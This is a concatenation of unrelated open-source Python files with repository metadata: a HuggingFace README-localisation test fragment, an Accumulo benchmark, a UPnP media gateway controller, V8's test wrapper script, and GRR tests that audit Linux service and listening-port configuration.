md_list = "1. **[ALBERT](https://huggingface.co/transformers/model_doc/albert.html)** (from Google Research and the Toyota Technological Institute at Chicago) released with the paper [ALBERT: A Lite BERT for Self-supervised Learning of Language Representations](https://arxiv.org/abs/1909.11942), by Zhenzhong Lan, Mingda Chen, Sebastian Goodman, Kevin Gimpel, Piyush Sharma, Radu Soricut.\n1. **[DistilBERT](https://huggingface.co/transformers/model_doc/distilbert.html)** (from HuggingFace), released together with the paper [DistilBERT, a distilled version of BERT: smaller, faster, cheaper and lighter](https://arxiv.org/abs/1910.01108) by Victor Sanh, Lysandre Debut and Thomas Wolf. The same method has been applied to compress GPT2 into [DistilGPT2](https://github.com/huggingface/transformers/tree/master/examples/distillation), RoBERTa into [DistilRoBERTa](https://github.com/huggingface/transformers/tree/master/examples/distillation), Multilingual BERT into [DistilmBERT](https://github.com/huggingface/transformers/tree/master/examples/distillation) and a German version of DistilBERT.\n1. **[ELECTRA](https://huggingface.co/transformers/model_doc/electra.html)** (from Google Research/Stanford University) released with the paper [ELECTRA: Pre-training text encoders as discriminators rather than generators](https://arxiv.org/abs/2003.10555) by Kevin Clark, Minh-Thang Luong, Quoc V. Le, Christopher D. Manning."
localized_md_list = "1. **[ALBERT](https://huggingface.co/transformers/model_doc/albert.html)** (来自 Google Research and the Toyota Technological Institute at Chicago) 伴随论文 [ALBERT: A Lite BERT for Self-supervised Learning of Language Representations](https://arxiv.org/abs/1909.11942), 由 Zhenzhong Lan, Mingda Chen, Sebastian Goodman, Kevin Gimpel, Piyush Sharma, Radu Soricut 发布。\n"
converted_md_list_sample = "1. **[ALBERT](https://huggingface.co/transformers/model_doc/albert.html)** (来自 Google Research and the Toyota Technological Institute at Chicago) 伴随论文 [ALBERT: A Lite BERT for Self-supervised Learning of Language Representations](https://arxiv.org/abs/1909.11942), 由 Zhenzhong Lan, Mingda Chen, Sebastian Goodman, Kevin Gimpel, Piyush Sharma, Radu Soricut 发布。\n1. **[DistilBERT](https://huggingface.co/transformers/model_doc/distilbert.html)** (来自 HuggingFace) 伴随论文 [DistilBERT, a distilled version of BERT: smaller, faster, cheaper and lighter](https://arxiv.org/abs/1910.01108) 由 Victor Sanh, Lysandre Debut and Thomas Wolf 发布。 The same method has been applied to compress GPT2 into [DistilGPT2](https://github.com/huggingface/transformers/tree/master/examples/distillation), RoBERTa into [DistilRoBERTa](https://github.com/huggingface/transformers/tree/master/examples/distillation), Multilingual BERT into [DistilmBERT](https://github.com/huggingface/transformers/tree/master/examples/distillation) and a German version of DistilBERT.\n1. **[ELECTRA](https://huggingface.co/transformers/model_doc/electra.html)** (来自 Google Research/Stanford University) 伴随论文 [ELECTRA: Pre-training text encoders as discriminators rather than generators](https://arxiv.org/abs/2003.10555) 由 Kevin Clark, Minh-Thang Luong, Quoc V. Le, Christopher D. Manning 发布。\n"
num_models_equal, converted_md_list = check_copies.convert_to_localized_md(
md_list, localized_md_list, localized_readme["format_model_list"]
)
self.assertFalse(num_models_equal)
self.assertEqual(converted_md_list, converted_md_list_sample)
num_models_equal, converted_md_list = check_copies.convert_to_localized_md(
md_list, converted_md_list, localized_readme["format_model_list"]
)
# Check whether the number of models is equal to README.md after conversion.
self.assertTrue(num_models_equal)
| 61.780822
| 1,434
| 0.729601
|
cfd8f61e110768742cbc25d98e9a940cb421373f
| 1,682
|
py
|
Python
|
test/system/bench/cloudstone1/cloudstone1.py
|
24601/accumulo
|
b32dd4906a83c065cdbd54df2c600a9e92f584af
|
[
"BSD-3-Clause"
] | null | null | null |
test/system/bench/cloudstone1/cloudstone1.py
|
24601/accumulo
|
b32dd4906a83c065cdbd54df2c600a9e92f584af
|
[
"BSD-3-Clause"
] | null | null | null |
test/system/bench/cloudstone1/cloudstone1.py
|
24601/accumulo
|
b32dd4906a83c065cdbd54df2c600a9e92f584af
|
[
"BSD-3-Clause"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import time
from lib import cloudshell
from lib.Benchmark import Benchmark
from lib.slaves import runAll
from lib.path import accumulo
class CloudStone1(Benchmark):
def shortDescription(self):
return 'Test the speed at which we can check that accumulo is up '\
'and we can reach all the slaves. Lower is better.'
def runTest(self):
code, out, err = cloudshell.run(self.username, self.password, 'table !METADATA\nscan\n')
self.assertEqual(code, 0, "Could not scan the !METADATA table. %s %s" % (out, err))
results = runAll('echo help | %s shell' %
accumulo('bin', 'accumulo'))
def setSpeed(self, speed):
"We want to override this method but no speed can be set"
def suite():
result = unittest.TestSuite([
CloudStone1(),
])
return result
| 37.377778
| 96
| 0.69679
|
e29a97d9f4db08f2e846450c7cba04a1d951a0a4
| 14,733
|
py
|
Python
|
WebBrickGateway/WebBrickGateway/Media.py
|
AndyThirtover/wb_gateway
|
69f9c870369085f4440033201e2fb263a463a523
|
[
"BSD-3-Clause"
] | null | null | null |
WebBrickGateway/WebBrickGateway/Media.py
|
AndyThirtover/wb_gateway
|
69f9c870369085f4440033201e2fb263a463a523
|
[
"BSD-3-Clause"
] | null | null | null |
WebBrickGateway/WebBrickGateway/Media.py
|
AndyThirtover/wb_gateway
|
69f9c870369085f4440033201e2fb263a463a523
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright L.P.Klyne 2013
# Licenced under 3 clause BSD licence
# $Id: Media.py 3138 2009-04-15 10:17:29Z philipp.schuster $
import sys, logging, string
from urlparse import urlparse, urljoin
from urllib import unquote, quote
import turbogears
import cherrypy
import ClientProfiles
from EventLib.Event import Event
from EventLib.Status import StatusVal
from EventLib.SyncDeferred import makeDeferred
from EventLib.EventHandler import EventHandler
from EventHandlers.BaseHandler import makeUri
from coherence.upnp.services.clients.caching_content_directory_client import UPNP_Container, UPNP_Item, UPNP_MediaServerList, device_name
from twisted.internet import reactor
import coherence.extern.louie as louie
_log = logging.getLogger( "WebBrickGateway.Media" )
# --------------------------------------------------
# Media interfaces
# --------------------------------------------------
class Media( object ):
"""
Local class to handle queries for media details
"""
def __init__(self):
uri,logname = makeUri(self.__class__)
super(Media,self).__init__(uri, self.doHandleEvent)
# local ids are just indexes into these arrays.
self._client_id = 0
self._clients = {} # UPNP clients
self._servers = UPNP_MediaServerList()
self.subcribeTimeout = 30
# this needs to be early so we get to see the startup of the eventhandler.
from coherence.base import Coherence
self._coherence = Coherence()
# subscribe to all events.
louie.connect(self.new_server, 'Coherence.UPnP.ControlPoint.MediaServer.detected', louie.Any)
louie.connect(self.new_renderer, 'Coherence.UPnP.ControlPoint.MediaRenderer.detected', louie.Any)
louie.connect(self.remove_server, 'Coherence.UPnP.ControlPoint.MediaServer.removed', louie.Any)
louie.connect(self.remove_renderer, 'Coherence.UPnP.ControlPoint.MediaRenderer.removed', louie.Any)
def start( self, despatch ):
pass
def stop(self, despatch):
louie.disconnect(self.new_server, 'Coherence.UPnP.ControlPoint.MediaServer.detected', louie.Any)
louie.disconnect(self.new_renderer, 'Coherence.UPnP.ControlPoint.MediaRenderer.detected', louie.Any)
louie.disconnect(self.remove_server, 'Coherence.UPnP.ControlPoint.MediaServer.removed', louie.Any)
louie.disconnect(self.remove_renderer, 'Coherence.UPnP.ControlPoint.MediaRenderer.removed', louie.Any)
def doHandleEvent( self, handler, event ):
et = event.getType()
od = event.getPayload()
return makeDeferred(StatusVal.OK)
def new_renderer(self, client, udn ):
# UPNP interface, the client is the local client to a UPNP renderer.
# again container ids are just integers.
for k in self._clients:
if self._clients[k].device.get_id() == udn:
_log.debug( "Update already exists %s", udn )
#self._clients[k] = client
return
self._client_id = self._client_id + 1
self._clients[self._client_id] = client
_log.debug( "new_renderer %u id %s", self._client_id, udn )
def remove_renderer(self, client, udn ):
_log.debug( "remove_renderer id %s", udn )
for k in self._clients:
if self._clients[k].device.get_id() == udn:
_log.debug( "removed renderer id %s", udn )
del self._clients[k]
break
def new_server(self, client, udn ):
# UPNP interface, the client is the local client to a UPNP server.
# again container ids are just integers.
_log.debug( "new_server udn %s", udn )
self._servers.add_server( client, udn )
def remove_server(self, client, udn ):
_log.debug( "remove_server id %s", udn )
self._servers.remove_server( client, udn )
def log_result(self, result):
for k in result:
itm = result[k]
if isinstance( itm, (list,tuple) ):
for itm2 in itm:
_log.debug( " item %s : %s", k, itm2 )
elif isinstance( itm, (dict) ):
_log.debug( " item %s :", k )
for key2 in itm:
itm2 = itm[key2]
_log.debug( " item %s : %s", key2, itm2 )
else:
_log.debug( "item %s : %s", k, itm )
#
# list returns a container-id and a list of entries, the list may be returned as a dictionary for a template or XML
#
def generate_list(self, result, rid, id, offset, limit):
#
# if id is none then list the server sources.
# else it a server-id:container-id.
#
# Output is an update to the result dictionary
# and the id of the container it is from.
#
_log.debug( "list id %s", id )
result["rid"] = str(rid) # in case browsing after select renderer
if rid:
rid = int(rid)
result["name"] = device_name(self._clients[rid])
else:
result["name"] = ""
srvc = None
if id:
srvc = self._servers.get_server(id)
if srvc:
ctr = srvc.get_container( id )
elif rid and self._clients.has_key(rid):
srvc = self._servers.default_server_for_renderer(device_name(self._clients[rid]))
if srvc:
id = srvc.get_top_level_container_id()
ctr = srvc.get_container( id )
result["title"] = "Browse"
if srvc:
_log.debug( "ctr %s", ctr )
if ctr:
result["title"] = ctr.title()
# result["title"] = "%s %s %s" % (ctr.artist(), ctr.album(), ctr.title())
result["items"] = list()
for ntry in srvc.enum_container(ctr, offset):
result["items"].append( ntry )
if len(result["items"]) >= limit:
break
result["id"] = id # container id
result["offset"] = offset
result["total"] = ctr.size()
result["count"] = len(result["items"])
result["limit"] = limit
result["breadcrumb"] = srvc.get_breadcrumb_trail(ctr)
else:
result["items"] = self._servers.get_servers()
def add_clients(self,result):
result["clients"] = {}
result["links"] = {}
for k in self._clients:
clnt = self._clients[k]
if clnt:
result["clients"][k] = device_name(clnt)
result["links"][k] = {}
for k2 in self._clients:
if k2 <> k and self._clients[k2]:
# This shows wheteher we should display Link/UnLink for this client pair.
result["links"][k][k2] = (True,True)
# as a dictionary and as XML
@turbogears.expose(template="WebBrickGateway.templates.mediaclient")
def client(self,rid):
rid = int(rid)
if not self._clients.has_key(rid):
return self.clients() # no longer present.
result = ClientProfiles.makeStandardResponse( cherrypy.request, "mediaclient" )
result["rid"] = rid
result["def_folder"] = "" # blank
result["sid"] = ""
srvc = self._servers.default_server_for_renderer(device_name(self._clients[rid]))
if srvc:
result["sid"] = srvc._server_id
result["def_folder"] = srvc.get_default_container_id()
result["limit"] = 50
# udn needed so client can pick up the correct event set.
result["udn"] = self._clients[rid].device.get_id()
result["name"] = device_name(self._clients[rid])
result["hasTransport"] = True # play,pause,position etc.
result["hasRenderer"] = True # volume
result["showServers"] = True # so can select tracks etc.
self.add_clients( result )
return result
# UPNP/media interface
#
@turbogears.expose(template="WebBrickGateway.templates.showqueue")
def showqueue(self, rid):
rid = int(rid)
id = None
srvc = self._servers.default_server_for_renderer(device_name(self._clients[rid]))
if srvc:
id = srvc.get_default_container_id()
result = ClientProfiles.makeStandardResponse( cherrypy.request, "showqueue" )
self.generate_list(result, rid, id, 0, sys.maxint )
self.log_result(result)
return result
#
# list returns a container-id and a list of entries, the list may be returned as a dictionary for a template or XML
#
@turbogears.expose(template="WebBrickGateway.templates.mediabrowse")
def list(self, rid, id, offset, limit):
#
# return a list of entries
# if id is none then list the server sources.
# else it a server-id:container-id.
#
# Output is a list of items
# and the id of the container it is from.
#
#TODO create breadcrumb trail
# refresh containers. May be better to get UPNP classes to handle this trail
#
_log.debug( "list id %s", id )
result = ClientProfiles.makeStandardResponse( cherrypy.request, "mediabrowse" )
self.generate_list(result, rid, id, int(offset), int(limit) )
self.log_result(result)
return result
@turbogears.expose(template="WebBrickGateway.templates.mediaclientlist")
def clients(self):
result = ClientProfiles.makeStandardResponse( cherrypy.request, "mediaclientlist" )
self.add_clients( result )
return result
def do_play(self, id, rid, queue_item):
# if id None/blank then add complete container to be played.
# locate server
# locate current renderer
# add to renderer play list.
_log.debug( "play id %s, on %s", id, rid )
if rid:
rid = int(rid)
srv = self._servers.get_server(id)
if srv:
itm = srv.get_item( id )
_log.debug( "%s play %s", srv, itm )
# get hold of the server and add to queue.
self._coherence.ctrl.play_item( srv._client, self._clients[rid], itm, queue_item )
@turbogears.expose()
def clearqueue(self, rid ):
# empty queue and return queue again
rid = int(rid)
_log.debug( "clearqueue rid %s", rid )
if self._clients.has_key(rid):
self._coherence.ctrl.clear_queue( self._clients[rid] )
return self.client(rid)
#return self.showqueue(rid)
@turbogears.expose()
def deletefromqueue(self, id, rid ):
# delete entry and return new contents.
rid = int(rid)
srv = self._servers.get_server(id)
if srv and self._clients.has_key(rid):
itm = srv.get_item( id )
if itm:
_log.debug( "deletefromqueue itm %s", itm )
reactor.callFromThread( self._clients[rid].av_transport.remove_from_queue, itm.id() )
return self.showqueue(rid)
@turbogears.expose(template="WebBrickGateway.templates.mediazonelink")
def zonelink(self, rid ):
rid = int(rid)
if not self._clients.has_key(rid):
return self.clients() # no longer present.
result = ClientProfiles.makeStandardResponse( cherrypy.request, "mediazonelink" )
result["rid"] = rid
# udn needed so client can pick up the correct event set.
result["udn"] = self._clients[rid].device.get_id()
result["name"] = device_name(self._clients[rid])
result["clients"] = {}
for k in self._clients:
clnt = self._clients[k]
if clnt and k <> rid: # exclude self.
result["clients"][k] = device_name(clnt)
# create list of zones
return result
@turbogears.expose()
def albumart(self, id, uri):
# the id of the track
#srv = self._servers.get_server(id)
#if srv:
# itm = srv.get_item( id )
# # get album art uri.
# DUMB proxy
#unescape uri
# parse
parsed = urlparse( unquote(uri) )
#r = DoHTTPRequest(wbaddr, "GET", wbUri)
@turbogears.expose()
def dozonelink(self, rid, target ):
_log.debug( "dozonelink rid %s target %s", rid, target )
if rid and target:
rid = int(rid)
target = int(target)
if self._clients.has_key(rid) and self._clients.has_key(target):
src_udn = "x-rincon:%s" % self._clients[rid].device.get_root_id()[5:]
_log.debug( "dozonelink source %s", src_udn )
reactor.callFromThread( self._clients[target].av_transport.set_av_transport_uri, 0, src_udn)
return self.zonelink(rid)
@turbogears.expose()
def dozonelinkall(self, rid):
rid = int(rid)
for k in self._clients:
if k <> rid:
self.dozonelink(rid, k )
return self.zonelink(rid)
@turbogears.expose()
def dozoneunlink(self, target ):
_log.debug( "dozoneunlink rid %s", target )
if target:
target = int(target)
if self._clients.has_key(target):
_log.debug( "dozonelink target %s", target )
reactor.callFromThread( self._clients[target].av_transport.unlink_from_group )
return self.clients()
@turbogears.expose()
def dozoneunlinkall(self, rid=None):
for k in self._clients:
if k <> rid:
self.dozoneunlink(k )
if rid:
return self.zonelink(rid)
return self.clients()
@turbogears.expose()
def play(self, id, rid=None, clearQ=None):
# if this is a single item then just play
# else clear the queue and add then play
self.do_play(id,rid,False)
return '' # success/failure?
@turbogears.expose()
def queue(self, id, rid=None, clearQ=None):
self.do_play(id,rid,True)
return '' # success/failure?
@turbogears.expose()
def playqueue(self, rid):
_log.debug( "playqueue on %s", rid )
if rid:
rid = int(rid)
srv = self._servers.default_server_for_renderer(device_name(self._clients[rid]))
cid = srv.get_default_container_id()
ctr = srv.get_container(cid)
# get hold of the server and add to queue.
self._coherence.ctrl.play_item( srv._client, self._clients[rid], ctr, False )
return self.client(rid)
@turbogears.expose()
def index(self,*args):
return self.clients( '' )
# $Id: Media.py 3138 2009-04-15 10:17:29Z philipp.schuster $
| 35.673123
| 137
| 0.594923
|
d99d055e5010e28bd0adae4347e9ea5800041f33
| 10,544
|
py
|
Python
|
deps/v8/tools/test-wrapper-gypbuild.py
|
racker/node
|
7338d9b66ee8b15aeb38d0bb3f03861f2458b10b
|
[
"BSD-2-Clause"
] | 5
|
2015-05-03T23:44:46.000Z
|
2020-01-04T22:20:56.000Z
|
deps/v8/tools/test-wrapper-gypbuild.py
|
trojanspike/node
|
2d0011f53256e7a1a707a6672772d36260f81691
|
[
"BSD-2-Clause"
] | null | null | null |
deps/v8/tools/test-wrapper-gypbuild.py
|
trojanspike/node
|
2d0011f53256e7a1a707a6672772d36260f81691
|
[
"BSD-2-Clause"
] | 1
|
2020-04-14T16:40:28.000Z
|
2020-04-14T16:40:28.000Z
|
#!/usr/bin/env python
#
# Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# This is a convenience script to run the existing tools/test.py script
# when using the gyp/make based build.
# It is intended as a stop-gap rather than a long-term solution.
import optparse
import os
from os.path import join, dirname, abspath
import subprocess
import sys
PROGRESS_INDICATORS = ['verbose', 'dots', 'color', 'mono']
def BuildOptions():
result = optparse.OptionParser()
# Flags specific to this wrapper script:
result.add_option("--arch-and-mode",
help='Architecture and mode in the format "arch.mode"',
default=None)
result.add_option("--outdir",
help='Base output directory',
default='out')
result.add_option("--no-presubmit",
help='Skip presubmit checks',
default=False, action="store_true")
result.add_option("--buildbot",
help='Adapt to path structure used on buildbots',
default=False, action="store_true")
# Flags this wrapper script handles itself:
result.add_option("-m", "--mode",
help="The test modes in which to run (comma-separated)",
default='release,debug')
result.add_option("--arch",
help='The architectures to run tests for (comma-separated)',
default='ia32,x64,arm')
# Flags that are passed on to the wrapped test.py script:
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option("-p", "--progress",
help="The style of progress indicator (verbose, dots, color, mono)",
choices=PROGRESS_INDICATORS, default="mono")
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("--download-data", help="Download missing test suite data",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=60, type="int")
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--special-command", default=None)
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--isolates", help="Whether to test isolates", default=False, action="store_true")
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
result.add_option("--stress-only",
help="Only run tests with --always-opt --stress-opt",
default=False, action="store_true")
result.add_option("--nostress",
help="Don't run crankshaft --always-opt --stress-op test",
default=False, action="store_true")
result.add_option("--shard-count",
help="Split testsuites into this number of shards",
default=1, type="int")
result.add_option("--shard-run",
help="Run this shard from the split up tests.",
default=1, type="int")
result.add_option("--noprof", help="Disable profiling support",
default=False)
# Flags present in the original test.py that are unsupported in this wrapper:
# -S [-> scons_flags] (we build with gyp/make, not scons)
# --no-build (always true)
# --build-only (always false)
# --build-system (always 'gyp')
# --simulator (always true if arch==arm, always false otherwise)
# --shell (automatically chosen depending on arch and mode)
return result
def ProcessOptions(options):
if options.arch_and_mode == ".":
options.arch = []
options.mode = []
else:
if options.arch_and_mode != None and options.arch_and_mode != "":
tokens = options.arch_and_mode.split(".")
options.arch = tokens[0]
options.mode = tokens[1]
options.mode = options.mode.split(',')
options.arch = options.arch.split(',')
for mode in options.mode:
if not mode.lower() in ['debug', 'release']:
print "Unknown mode %s" % mode
return False
for arch in options.arch:
if not arch in ['ia32', 'x64', 'arm', 'mips']:
print "Unknown architecture %s" % arch
return False
if options.buildbot:
# Buildbots run presubmit tests as a separate step.
options.no_presubmit = True
return True
def PassOnOptions(options):
result = []
if options.verbose:
result += ['--verbose']
if options.progress != 'mono':
result += ['--progress=' + options.progress]
if options.report:
result += ['--report']
if options.download_data:
result += ['--download-data']
if options.suite != []:
for suite in options.suite:
result += ['--suite=../../test/' + suite]
if options.timeout != 60:
result += ['--timeout=%s' % options.timeout]
if options.snapshot:
result += ['--snapshot']
if options.special_command:
result += ['--special-command="%s"' % options.special_command]
if options.valgrind:
result += ['--valgrind']
if options.cat:
result += ['--cat']
if options.warn_unused:
result += ['--warn-unused']
if options.j != 1:
result += ['-j%s' % options.j]
if options.time:
result += ['--time']
if not options.suppress_dialogs:
result += ['--no-suppress-dialogs']
if options.isolates:
result += ['--isolates']
if not options.store_unexpected_output:
result += ['--no-store-unexpected_output']
if options.stress_only:
result += ['--stress-only']
if options.nostress:
result += ['--nostress']
if options.shard_count != 1:
result += ['--shard-count=%s' % options.shard_count]
if options.shard_run != 1:
result += ['--shard-run=%s' % options.shard_run]
if options.noprof:
result += ['--noprof']
return result
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
workspace = abspath(join(dirname(sys.argv[0]), '..'))
returncodes = 0
if not options.no_presubmit:
print ">>> running presubmit tests"
returncodes += subprocess.call([workspace + '/tools/presubmit.py'])
args_for_children = ['python']
args_for_children += [workspace + '/tools/test.py'] + PassOnOptions(options)
args_for_children += ['--no-build', '--build-system=gyp']
for arg in args:
args_for_children += [arg]
env = os.environ
for mode in options.mode:
for arch in options.arch:
print ">>> running tests for %s.%s" % (arch, mode)
if options.buildbot:
shellpath = workspace + '/' + options.outdir + '/' + mode
mode = mode.lower()
else:
shellpath = workspace + '/' + options.outdir + '/' + arch + '.' + mode
env['LD_LIBRARY_PATH'] = shellpath + '/lib.target'
shell = shellpath + "/d8"
cmdline = ' '.join(args_for_children +
['--arch=' + arch] +
['--mode=' + mode] +
['--shell=' + shell])
child = subprocess.Popen(cmdline,
shell=True,
cwd=workspace,
env=env)
returncodes += child.wait()
if len(options.mode) == 0 and len(options.arch) == 0:
print ">>> running tests"
shellpath = workspace + '/' + options.outdir
env['LD_LIBRARY_PATH'] = shellpath + '/lib.target'
shell = shellpath + '/d8'
child = subprocess.Popen(' '.join(args_for_children +
['--shell=' + shell]),
shell=True,
cwd=workspace,
env=env)
returncodes = child.wait()
return returncodes
if __name__ == '__main__':
sys.exit(Main())
| 39.639098
| 102
| 0.638657
|
aff7ad795d84b58d719703f2d3322affb0aab5f8
| 9,522
|
py
|
Python
|
grr/checks/services_test.py
|
theGreenJedi/grr
|
d9e11e304dc299d49c76b7fdf6fdbfcd4b8eec39
|
[
"Apache-2.0"
] | null | null | null |
grr/checks/services_test.py
|
theGreenJedi/grr
|
d9e11e304dc299d49c76b7fdf6fdbfcd4b8eec39
|
[
"Apache-2.0"
] | null | null | null |
grr/checks/services_test.py
|
theGreenJedi/grr
|
d9e11e304dc299d49c76b7fdf6fdbfcd4b8eec39
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for service state checks."""
from grr.lib import flags
from grr.lib import test_lib
from grr.lib.checks import checks_test_lib
from grr.lib.rdfvalues import client as rdf_client
from grr.parsers import linux_service_parser
from grr.parsers import linux_service_parser_test
class XinetdServiceStateTests(checks_test_lib.HostCheckTest):
@classmethod
def setUpClass(cls):
cls.LoadCheck("services.yaml")
cls.parser = linux_service_parser.LinuxXinetdParser().ParseMultiple
def RunXinetdCheck(self,
chk_id,
svc,
disabled,
sym,
found,
xinetd=False,
should_detect=True):
host_data = self.SetKnowledgeBase()
cfgs = linux_service_parser_test.GenXinetd(svc, disabled)
stats, files = linux_service_parser_test.GenTestData(cfgs, cfgs.values())
data = list(self.parser(stats, files, None))
# create entries on whether xinetd itself is setup to start or not
if xinetd:
cfgs = linux_service_parser_test.GenInit(
"xinetd", "the extended Internet services daemon")
stats, files = linux_service_parser_test.GenTestData(cfgs, cfgs.values())
lsb_parser = linux_service_parser.LinuxLSBInitParser()
data.extend(list(lsb_parser.ParseMultiple(stats, files, None)))
host_data["LinuxServices"] = self.SetArtifactData(parsed=data)
results = self.RunChecks(host_data)
if should_detect:
self.assertCheckDetectedAnom(chk_id, results, sym, found)
else:
self.assertCheckUndetected(chk_id, results)
def testEmptyXinetdCheck(self):
chk_id = "CIS-INETD-WITH-NO-SERVICES"
sym = "Missing attribute: xinetd running with no xinetd-managed services."
found = ["Expected state was not found"]
# xinetd is running and the only service is disabled - there should be a hit
self.RunXinetdCheck(chk_id,
"finger",
"yes",
sym,
found,
xinetd=True,
should_detect=True)
# xinetd is running and there is a service enabled - no hit
self.RunXinetdCheck(chk_id,
"finger",
"no",
sym,
found,
xinetd=True,
should_detect=False)
# xinetd not running and the only service is disabled - no hit
self.RunXinetdCheck(chk_id,
"finger",
"yes",
sym,
found,
xinetd=False,
should_detect=False)
# xinetd not running and there is a service enabled - no hit
self.RunXinetdCheck(chk_id,
"finger",
"no",
sym,
found,
xinetd=False,
should_detect=False)
def testLegacyXinetdServicesCheck(self):
chk_id = "CIS-SERVICE-LEGACY-SERVICE-ENABLED"
sym = "Found: Legacy services are running."
found = ["telnet is started by XINETD"]
self.RunXinetdCheck(chk_id, "telnet", "no", sym, found)
self.RunXinetdCheck(chk_id,
"telnet",
"yes",
sym,
found,
should_detect=False)
def testUnwantedServicesCheck(self):
chk_id = "CIS-SERVICE-SHOULD-NOT-RUN"
sym = "Found: Remote administration services are running."
found = ["webmin is started by XINETD"]
self.RunXinetdCheck(chk_id, "webmin", "no", sym, found)
self.RunXinetdCheck(chk_id,
"webmin",
"yes",
sym,
found,
should_detect=False)
class SysVInitStateTests(checks_test_lib.HostCheckTest):
results = None
@classmethod
def setUpClass(cls):
cls.LoadCheck("services.yaml")
cls.parser = linux_service_parser.LinuxSysVInitParser().ParseMultiple
def setUp(self, *args, **kwargs):
super(SysVInitStateTests, self).setUp(*args, **kwargs)
self.RunSysVChecks()
def RunSysVChecks(self):
host_data = self.SetKnowledgeBase()
links = ["/etc/rc2.d/S50xinetd", "/etc/rc2.d/S60wu-ftpd",
"/etc/rc2.d/S10ufw"]
stats, files = linux_service_parser_test.GenTestData(links,
[""] * len(links),
st_mode=41471)
parsed = list(self.parser(stats, files, None))
host_data["LinuxServices"] = self.SetArtifactData(parsed=parsed)
self.results = self.RunChecks(host_data)
def testEmptyXinetdCheck(self):
chk_id = "CIS-INETD-WITH-NO-SERVICES"
sym = "Missing attribute: xinetd running with no xinetd-managed services."
self.assertCheckDetectedAnom(chk_id, self.results, sym)
def testLegacyServicesCheck(self):
chk_id = "CIS-SERVICE-LEGACY-SERVICE-ENABLED"
sym = "Found: Legacy services are running."
found = ["wu-ftpd is started by INIT"]
self.assertCheckDetectedAnom(chk_id, self.results, sym, found)
def testRequiredServicesNotRunningCheck(self):
chk_id = "CIS-SERVICE-SHOULD-RUN"
sym = "Missing attribute: Sysstat is not started at boot time."
self.assertCheckDetectedAnom(chk_id, self.results, sym)
class ListeningServiceTests(checks_test_lib.HostCheckTest):
@classmethod
def setUpClass(cls):
cls.LoadCheck("services.yaml")
def GenHostData(self):
# Create some host_data..
host_data = self.SetKnowledgeBase()
loop4 = self.AddListener("127.0.0.1", 6000)
loop6 = self.AddListener("::1", 6000, "INET6")
ext4 = self.AddListener("10.1.1.1", 6000)
ext6 = self.AddListener("fc00::1", 6000, "INET6")
x11 = rdf_client.Process(name="x11", pid=1233, connections=[loop4, loop6])
xorg = rdf_client.Process(name="xorg",
pid=1234,
connections=[loop4, loop6, ext4, ext6])
sshd = rdf_client.Process(name="sshd",
pid=1235,
connections=[loop4, loop6, ext4, ext6])
# Note: ListProcessesGrr is a flow artifact, hence it needs to be of
# raw context.
host_data["ListProcessesGrr"] = self.SetArtifactData(raw=[x11, xorg, sshd])
return host_data
def testFindListeningServicesCheck(self):
chk_id = "CIS-SERVICE-SHOULD-NOT-LISTEN"
sym = "Found: Insecure services are accessible over the network."
found = ["xorg (pid 1234) listens on 127.0.0.1,::1,10.1.1.1,fc00::1"]
host_data = self.GenHostData()
